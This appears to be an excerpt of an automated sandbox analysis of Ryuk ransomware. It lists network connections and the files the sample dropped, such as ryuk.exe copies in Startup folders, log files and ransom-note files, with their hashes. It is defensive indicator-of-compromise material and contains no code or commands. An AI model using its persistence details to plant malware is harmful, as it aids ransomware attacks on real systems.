US 20.42.73.25:443 tcp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp

Files

C:\ProgramData\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\hrmlog1

MD5 4e473b117f0782626d179384f10f6bed
SHA1 121d543dbd3b3255150be29bdff40d61ac69506f
SHA256 bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5
SHA512 555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4e473b117f0782626d179384f10f6bed
SHA1 121d543dbd3b3255150be29bdff40d61ac69506f
SHA256 bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5
SHA512 555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 72871fdc9229fa4256d991720d2f3d0f
SHA1 ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef
SHA256 2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0
SHA512 f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

C:\ProgramData\hrmlog1

MD5 4e473b117f0782626d179384f10f6bed
SHA1 121d543dbd3b3255150be29bdff40d61ac69506f
SHA256 bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5
SHA512 555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

C:\ProgramData\hrmlog2

MD5 72871fdc9229fa4256d991720d2f3d0f
SHA1 ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef
SHA256 2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0
SHA512 f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

C:\ProgramData\hrmlog2

MD5 72871fdc9229fa4256d991720d2f3d0f
SHA1 ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef
SHA256 2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0
SHA512 f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

C:\ProgramData\RYUKID

MD5 728c12c960ea2380a041740b51a6cc50
SHA1 205d24f54069a0ec5fb3138cf3d0779b1fbb9a00
SHA256 3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2
SHA512 0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 728c12c960ea2380a041740b51a6cc50
SHA1 205d24f54069a0ec5fb3138cf3d0779b1fbb9a00
SHA256 3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2
SHA512 0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

C:\ProgramData\hrmlog2

MD5 72871fdc9229fa4256d991720d2f3d0f
SHA1 ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef
SHA256 2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0
SHA512 f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

C:\ProgramData\hrmlog1

MD5 4e473b117f0782626d179384f10f6bed
SHA1 121d543dbd3b3255150be29bdff40d61ac69506f
SHA256 bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5
SHA512 555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4